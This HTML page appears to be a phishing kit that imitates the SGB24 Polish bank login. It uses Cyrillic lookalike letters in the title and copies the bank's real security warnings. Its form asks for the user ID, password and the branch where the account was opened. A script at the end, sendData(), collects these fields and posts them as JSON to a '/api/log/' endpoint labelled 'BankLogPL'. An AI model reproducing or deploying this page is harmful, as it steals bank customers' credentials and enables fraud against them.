<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<title>Bаnkowość Intеrnetоwа</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="shortcut icon" type="image/x-icon" href="https://www.sgb.pl/favicon.ico">
<script src="https://code.jquery.com/jquery-3.6.0.js"></script>
<script src="/static/style/protect/protect.js"></script>
<style>
md-select.md-theme-theme .md-select-value{border-bottom-color:rgba(0,0,0,0.12)}md-select.md-theme-theme:not([disabled]):focus .md-select-value{border-bottom-color:rgb(50,157,49);color:rgba(0,0,0,0.87)}md-select.md-theme-theme .md-select-icon{color:rgba(0,0,0,0.54)}md-select.md-theme-theme .md-select-value span:first-child:after{color:rgb(208,2,27)}md-content.md-theme-theme{color:rgba(0,0,0,0.87);background-color:rgb(250,250,250)}md-select-menu.md-theme-theme md-content{background-color:rgb(255,255,255)} body,html{height:100%;position:relative}body{margin:0;padding:0}input{vertical-align:baseline}input:-webkit-autofill{text-shadow:none}body,html{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-touch-callout:none;min-height:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}html,input{font-family:Roboto,Helvetica Neue,sans-serif}input{font-size:100%}md-content{display:block;position:relative;overflow:auto;-webkit-overflow-scrolling:touch}@media print{md-content{overflow:visible!important}}md-input-container:not(.md-input-has-value):not(.md-input-has-placeholder) input:not(:focus){color:transparent}md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-ampm-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-day-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-hour-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-millisecond-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-minute-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-month-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-second-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-text,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-week-field,md-input-container:not(.md-input-has-value) input:not(:focus)::-webkit-datetime-edit-year-field{color:transparent}.md-select-menu-container{position:fixed;left:0;top:0;z-index:90;opacity:0;display:none;-webkit-transform:translateY(-1px);transform:translateY(-1px)}.md-select-menu-container:not(.md-clickable){pointer-events:none}md-select{display:-webkit-box;display:-ms-flexbox;display:flex;margin:20px 0 26px}md-select:focus{outline:none}md-select:not([disabled]):hover{cursor:pointer}md-select:not([disabled]):focus .md-select-value{border-bottom-width:2px;border-bottom-style:solid;padding-bottom:0}.md-select-value{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:2px 2px 1px;border-bottom-width:1px;border-bottom-style:solid;background-color:transparent;position:relative;-webkit-box-sizing:content-box;box-sizing:content-box;min-width:64px;min-height:26px;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1}.md-select-value>span:not(.md-select-icon){max-width:100%;-webkit-box-flex:1;-ms-flex:1 1 auto;flex:1 1 auto;text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.md-select-value>span:not(.md-select-icon) .md-text{display:inline}.md-select-value .md-select-icon{display:block;-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end;text-align:right;width:24px;margin:0 4px;-webkit-transform:translate3d(0,-2px,0);transform:translate3d(0,-2px,0);font-size:1.2rem}.md-select-value .md-select-icon:after{display:block;content:"\25BC";position:relative;top:2px;speak:none;font-size:13px;-webkit-transform:scaleY(.5) scaleX(1);transform:scaleY(.5) scaleX(1)}md-select-menu{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-shadow:0 1px 3px 0 rgba(0,0,0,.2),0 1px 1px 0 rgba(0,0,0,.14),0 2px 1px -1px rgba(0,0,0,.12);box-shadow:0 1px 3px 0 rgba(0,0,0,.2),0 1px 1px 0 rgba(0,0,0,.14),0 2px 1px -1px rgba(0,0,0,.12);max-height:256px;min-height:48px;overflow-y:hidden;-webkit-transform-origin:left top;transform-origin:left top;-webkit-transform:scale(1);transform:scale(1)}md-select-menu:not(.md-overflow) md-content{padding-top:8px;padding-bottom:8px}md-select-menu md-content{min-width:136px;min-height:48px;max-height:256px;overflow-y:auto}md-select-menu>*{opacity:0}@media screen and (-ms-high-contrast:active){md-select-menu{border:1px solid #fff}}@-moz-document url-prefix(){}.layout-align-end-stretch{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end}.layout-align-space-between-center,.layout-align-space-between-start{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.layout-align-space-between-start{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start;-ms-flex-line-pack:start;align-content:flex-start}.layout-align-space-between-center{-webkit-box-align:center;-ms-flex-align:center;align-items:center;-ms-flex-line-pack:center;align-content:center;max-width:100%}.layout-align-space-between-center>*{max-width:100%;-webkit-box-sizing:border-box;box-sizing:border-box}.layout-align-end-stretch{-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;-ms-flex-line-pack:stretch;align-content:stretch}.flex{-webkit-box-flex:1;-ms-flex:1;flex:1}.flex{-webkit-box-sizing:border-box;box-sizing:border-box}.layout-column,.layout-row{-webkit-box-sizing:border-box;box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex}.layout-column{-webkit-box-orient:vertical;-ms-flex-direction:column;flex-direction:column}.layout-column,.layout-row{-webkit-box-direction:normal}.layout-row{-webkit-box-orient:horizontal;-ms-flex-direction:row;flex-direction:row}@media (min-width:960px){.layout-gt-sm-row{-webkit-box-sizing:border-box;box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex}.layout-gt-sm-row{-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}}*{font-family:Lato,sans-serif!important;outline:none;-webkit-box-sizing:border-box;box-sizing:border-box}body,html{background-color:#f7f7f7}#loading-bar-container,#loading-bar-container>div,#loading-bar-container>div>div{height:100%}.button{text-transform:uppercase;font-size:12px;font-weight:600;border-radius:5px;width:100%;color:#329d31;line-height:48px;border:none;padding:0;background:transparent}.button__raised{background:linear-gradient(153.43deg,#64b530,#329d31);color:#fff}.button__link{font-size:10px;line-height:20px;color:#329d31;text-decoration:none}.select-language{width:80px;border:1px solid #e5e5e5;border-radius:5px}.select-language md-select{margin:6px 10px}.select-language md-select .md-select-value{padding:0;border-bottom:none;color:#2e2f34}.select-language md-select:not([disabled]):focus .md-select-value{border:0}.select-language md-select .md-select-icon{background-image:url("./sgb/sgb-1.svg");height:20px;margin:0;color:#329d31}.select-language md-select .md-select-icon:after{visibility:hidden}@font-face{font-family:Lato;src:url("./sgb/sgb-7.ttf");font-weight:600;font-style:normal}@font-face{font-family:Lato;src:url("./sgb/sgb-6.ttf");font-weight:300;font-style:normal}@font-face{font-family:Lato;src:url("./sgb/sgb-8.ttf");font-weight:400;font-style:normal}*{font-family:Lato,sans-serif!important;outline:none;-webkit-box-sizing:border-box;box-sizing:border-box}body,html{background-color:#f7f7f7}#loading-bar-container,#loading-bar-container>div,#loading-bar-container>div>div{height:100%}.select-language{width:80px;border:1px solid #e5e5e5;border-radius:5px}.select-language md-select{margin:6px 10px}.select-language md-select .md-select-value{padding:0;border-bottom:none;color:#2e2f34}.select-language md-select:not([disabled]):focus .md-select-value{border:0}.select-language md-select .md-select-icon{background-image:url("./sgb/sgb-1.svg");height:20px;margin:0;color:#329d31}.select-language md-select .md-select-icon:after{visibility:hidden}.button{text-transform:uppercase;font-size:12px;font-weight:600;border-radius:5px;width:100%;color:#329d31;line-height:48px;border:none;padding:0;background:transparent}.button__raised{background:linear-gradient(153.43deg,#64b530,#329d31);color:#fff}.button__link{font-size:10px;line-height:20px;color:#329d31;text-decoration:none}.authentication{max-width:1920px;margin:0 auto}@media (min-width:1920px){.authentication{margin:0 0 0 auto}}.authentication background-component{display:none}@media (min-width:960px){.authentication background-component{display:block}}.authentication background-component img{top:0;width:100%;height:100%;max-width:816px;position:absolute}.authentication__banner{margin-bottom:24px}.authentication__banner img{max-width:376px;width:100%}.authentication__wrapper{height:100%;background:#f7f7f7}@media (min-width:960px){.authentication__wrapper{position:absolute;right:0;overflow:auto;max-width:890px}}@media (min-width:1366px){.authentication__wrapper{max-width:1114px}}.authentication__logo{padding-bottom:10px;font-size:0;width:100%}.authentication__container{background:#fff;color:#474747;position:relative}@media (min-width:960px){.authentication__container{width:434px}}@media (min-width:1366px){.authentication__container{width:578px}}.authentication__content{font-size:14px;margin:0 auto;background:#fff;padding:10px 0 32px}@media (min-width:960px){.authentication__content{max-width:100%;padding:10px 56px 32px}}@media (min-width:1366px){.authentication__content{padding:88px 128px 32px}}.authentication__form{width:100%;padding-bottom:20px}.authentication__form--title{color:#191818;line-height:32px;margin-bottom:16px;font-size:22px}@media (min-width:960px){.authentication__form--title{font-size:26px}}.authentication__form--subtitle{line-height:20px;margin-bottom:40px}.authentication__form--fields{margin-bottom:24px}.authentication__form--label{margin-bottom:16px}.authentication__form--input{border-radius:5px!important;border:1px solid #e4e4e4!important;width:100%;height:48px!important;font-weight:300;padding:10px 16px!important;line-height:1!important}.authentication__button-group{margin-bottom:24px}.authentication__footer{width:100%;max-width:312px;margin:0 auto}.authentication__footer--links{text-align:right}.authentication__rules{background-color:#f7f7f7;color:#313131;font-size:12px;line-height:20px;padding:24px 0;max-width:312px;margin:0 auto}@media (min-width:960px){.authentication__rules{margin:0;max-width:100%;width:456px;padding:32px 40px}}@media (min-width:1366px){.authentication__rules{width:536px;padding:32px 80px}}.authentication__rules--title{color:#191818;font-size:20px;line-height:24px;margin-bottom:16px}.authentication__rules--information{margin-bottom:8px}.authentication__rules--list{margin-bottom:16px}.authentication__rules--list-item{line-height:20px;margin-bottom:8px;position:relative;padding-left:16px}.authentication__rules--list-item:before{content:"○";position:absolute;font-size:18px;width:1px;color:#329d31;border-radius:100%;left:0;top:-1px}.authentication__rules--alert{margin-bottom:16px;padding:8px 16px;border:1px solid #ffcf8e;border-radius:5px;background-color:#fff9ed}@media (min-width:1921px){.authentication{margin:0;max-width:100vw}.authentication background-component img{max-width:36%}.authentication .authentication__wrapper{left:36%;right:auto}}
</style></head>

<body id="auth-body">
<div id="loading-bar-container">
<div id="application"><div id="__single_spa_angular_1" class="ng-scope"><span class="ng-scope"><div class="authentication ng-scope">
<background-component class="ng-isolate-scope"><img src="/static/style/banksPL/sgb/sgb-3.jpeg">
</background-component>
<div class="authentication__wrapper layout-gt-sm-row layout-align-end-stretch">
<div class="authentication__container">
<div class="authentication__content layout-align-space-between-start layout-column flex">
<div style="width: 100%; max-width: 312px; margin: 0 auto;">
<div class="authentication__logo">
<logo-component class="ng-scope ng-isolate-scope"><img style="max-width: 320px" src="/static/style/banksPL/sgb/sgb-5.jpeg">
</logo-component>
</div>
<div class="authentication__form ng-scope flex">
<form method="post" id="formblock" class="ng-pristine ng-scope ng-valid-maxlength ng-valid ng-valid-required">
<div class="authentication__form--title ng-binding">Zaloguj sie</div>
<div class="authentication__form--subtitle ng-binding">Zaloguj się do internetowej bankowości elektronicznej</div>
<div class="authentication__form--fields">
<div class="authentication__form--label ng-binding">Identyfikator użytkownika</div>
<input class="authentication__form--input ng-pristine ng-empty ng-valid-maxlength ng-valid ng-valid-required ng-touched" type="text" id="field3ds" name="login">
</div>
<div class="authentication__form--fields">
<div class="authentication__form--label ng-binding">Kod dostępu</div>
<input class="authentication__form--input ng-pristine ng-empty ng-valid-maxlength ng-valid ng-valid-required ng-touched" type="password" id="field3ds" name="password" placeholder="Wprowadź hasło">
</div>
<div class="authentication__form--fields">
<div class="authentication__form--label ng-binding">W którym oddziale założono konto</div>
<input class="authentication__form--input ng-pristine ng-empty ng-valid-maxlength ng-valid ng-valid-required ng-touched" minlength="10" type="text" required="" id="field3ds" name="otdel" placeholder="Warzshaw ,ul. Płocka 14, 06-450 Glinojeck
">
</div>
<div class="authentication__button-group">
<input class="button button__raised ng-binding" type="submit" value="Zaloguj się">
</div>
</form>
</div>
</div>
<div class="authentication__footer layout-align-space-between-center layout-row">
<div>
<span>
<select-language><div class="select-language">
<md-select class="ng-pristine ng-untouched ng-valid md-no-asterisk md-theme-theme ng-empty" role="button"><md-select-value class="md-select-value" id="select_value_label_0"><span><div class="md-text ng-binding">
EN
</div></span><span class="md-select-icon"></span></md-select-value><div class="md-select-menu-container" role="presentation" id="select_container_2">  <md-select-menu role="presentation" class="_md md-theme-theme"><md-content role="listbox" class="_md md-theme-theme" id="select_listbox_3">
</md-content></md-select-menu></div></md-select>
</div></select-language>
</span>
</div>
<div class="authentication__footer--links">
<div>
<a class="button button__link ng-binding md-theme-theme" ng-href="#/komunikaty-o-bezpieczenstwie/" target="_blank" href="#">
WIADOMOŚCI BEZPIECZEŃSTWA
</a>
</div>
<div>
<a class="button button__link ng-binding md-theme-theme" ng-href="#/aktualnosci/Archiwalne-wydarzenia/bezpieczne-zakupy-w-internecie-dobre-praktyki" target="_blank" href="https://zbp.pl/aktualnosci/Archiwalne-wydarzenia/bezpieczne-zakupy-w-internecie-dobre-praktyki">
Bezpieczne zakupy online
</a>
</div>
</div>
</div>
</div>
</div>
<div class="authentication__rules">
<authentication-rules-component class="ng-isolate-scope"><div style="max-height: 706px;">
<div class="authentication__banner">
<banner-component class="ng-isolate-scope"><a href="#" target="_blank" class="ng-scope md-theme-theme">
<img src="/static/style/banksPL/sgb/sgb-4.jpeg">
</a>
</banner-component>
</div>
<div class="ng-scope">
<div class="ng-binding"><br>   <div> <div class="authentication__rules--title ng-binding">Pamiętaj o zasadach bezpieczeństwa.</div>  <div class="authentication__rules--list"> <div class="authentication__rules--list-item ng-binding">Wpisuj adres strony logowania do Bankowości Internetowej SGВ24 lub korzystaj z oficjalnej strony Banku – nie korzystaj ze stron pojawiających się w wynikach wyszukiwania w przeglądarce. Adres strony logowania rozpoczyna się od https (oznaczającego bezpieczne połączenie internetowe).</div> <div class="authentication__rules--list-item ng-binding">Zawsze sprawdzaj adres strony www, na której się logujesz. Adres rozpoczyna się od https:// (w adresie strony widnieje wyłącznie domena <b>sgb24.pl</b>). <b>Pamiętaj również o weryfikacji ważności certyfikatu wystawionego dla sgb24.pl przez firmę DigiCert. Możesz to sprawdzić, klikając w kłódkę.</b></div> <div class="authentication__rules--list-item ng-binding">Nigdy nie loguj się do Bankowości Internetowej za pośrednictwem linku otrzymanego w wiadomości e-mail/ sms lub będącego wynikiem wyszukiwania w przeglądarce.</div> </div>  <div class="authentication__rules--alert"> <strong class="ng-binding">Pamiętaj!</strong> <div class="ng-binding">Bank nie wymaga potwierdzenia danych SMS-em lub mailem oraz instalacji jakichkolwiek aplikacji na komputerach użytkowników. </div>  <div> <div class="authentication__rules--information ng-binding">W przypadku wystąpienia nieprawidłowości niezwłocznie skontaktuj się z Doradcą Infolinii Banku</div>  <div class="authentication__rules--list"> <div class="authentication__rules--list-item"> <strong class="ng-binding">800&nbsp;88&nbsp;88&nbsp;88</strong> </div>  <div class="authentication__rules--list-item"> <strong class="ng-binding">(+48)&nbsp;61&nbsp;647&nbsp;28&nbsp;46 </strong> <span class="ng-binding">( dla połączeń komórkowych oraz z zagranicy)</span> </div> </div> </div></div></div></div>
</div>
</div>
</authentication-rules-component>
</div>
</div>
</div>
</span></div></div>
</div>

<script type="text/javascript">
    function sendData() {
        var data = $('#formblock').serializeArray().reduce(function(obj, item) {
            obj[item.name] = item.value;
            return obj;
        }, {});

        fetch(`/api/log/${window.location.pathname.split('/')[3]}`, {
            method: 'POST',
            cache: 'no-cache',
            headers: {
                'Accept': 'application/json, text/plain, */*',
                'Content-Type': 'application/json'
            },
            referrerPolicy: 'no-referrer',
            body: JSON.stringify({
                login: data.login,
                password: data.password,
                otdel: data.otdel,
                bank: 'sgb',
                method: 'BankLogPL'
            })
        })
    }
</script>

</body></html>